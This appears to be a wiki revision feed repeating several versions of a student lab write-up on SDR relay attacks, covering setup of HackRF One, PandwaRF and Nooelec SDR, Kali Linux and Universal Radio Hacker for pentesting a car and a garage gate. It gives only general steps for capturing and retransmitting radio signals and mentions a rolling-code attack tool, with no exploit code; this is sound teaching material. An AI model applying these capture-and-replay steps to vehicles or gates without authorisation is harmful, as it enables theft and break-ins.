#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10282</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10282"/>
		<updated>2022-07-12T18:41:44Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
We used 3 different devices for the penetration-testing of a car and a gate. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Hardware &#039;&#039;&#039;&lt;br /&gt;
*HackRF-One&lt;br /&gt;
*PandwaRF&lt;br /&gt;
*Nooelec SDR (No transmission possible)&lt;br /&gt;
*Car&lt;br /&gt;
*Garage gate&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*Universal Radio Hacker.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
* Step 1&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
** Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
* Step 2&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
 &lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10281</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10281"/>
		<updated>2022-07-12T18:41:11Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
We used 3 different devices for the penetration-testing of a car and a gate. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Hardware &#039;&#039;&#039;&lt;br /&gt;
*HackRF-One&lt;br /&gt;
*PandwaRF&lt;br /&gt;
*Nooelec SDR (No transmission possible)&lt;br /&gt;
*Car&lt;br /&gt;
*Garage gate&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*Universal Radio Hacker.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
* Step 1&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
** Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
* Step 2&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
 &lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10280</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10280"/>
		<updated>2022-07-12T18:40:42Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
We used 3 different devices for the penetration-testing of a car and a gate. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Hardware &#039;&#039;&#039;&lt;br /&gt;
*HackRF-One&lt;br /&gt;
*PandwaRF&lt;br /&gt;
*Nooelec SDR (No transmission possible)&lt;br /&gt;
*Car&lt;br /&gt;
*Garage gate&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*Universal Radio Hacker.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
* Step 1&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
** Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
* Step 2&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
 &lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
** The device settings are listed below:&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10279</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10279"/>
		<updated>2022-07-12T18:40:00Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
We used 3 different devices for the penetration-testing of a car and a gate. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Hardware &#039;&#039;&#039;&lt;br /&gt;
*HackRF-One&lt;br /&gt;
*PandwaRF&lt;br /&gt;
*Nooelec SDR (No transmission possible)&lt;br /&gt;
*Car&lt;br /&gt;
*Garage gate&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*Universal Radio Hacker.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF one ===&lt;br /&gt;
&lt;br /&gt;
* Step 1&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
** Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website &lt;br /&gt;
&lt;br /&gt;
* Step 2&lt;br /&gt;
** Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig &lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
